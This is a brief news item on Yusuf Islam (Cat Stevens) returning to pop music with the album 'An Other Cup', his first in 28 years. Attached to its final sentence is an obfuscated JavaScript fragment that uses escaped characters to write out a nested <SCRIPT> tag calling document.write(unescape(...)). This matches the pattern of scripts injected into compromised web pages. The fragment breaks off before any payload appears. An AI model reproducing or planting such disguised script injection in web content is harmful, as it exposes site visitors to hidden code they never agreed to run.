The artist formerly known as Cat Stevens is returning to the music that made him famous.
Yusuf Islam, as he's known now, plans on releasing a pop album, his first in 28 years. Islam says in a statement, "I feel right about making music and singing about life in this fragile world again." He says it's important for him to help bridge the cultural gaps that others are sometimes frightened to cross. The album is called "An Other Cup" and it's set to come out in November.
His last studio album was "Back to Earth" in 1978, a year after Stevens had converted to Islam.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
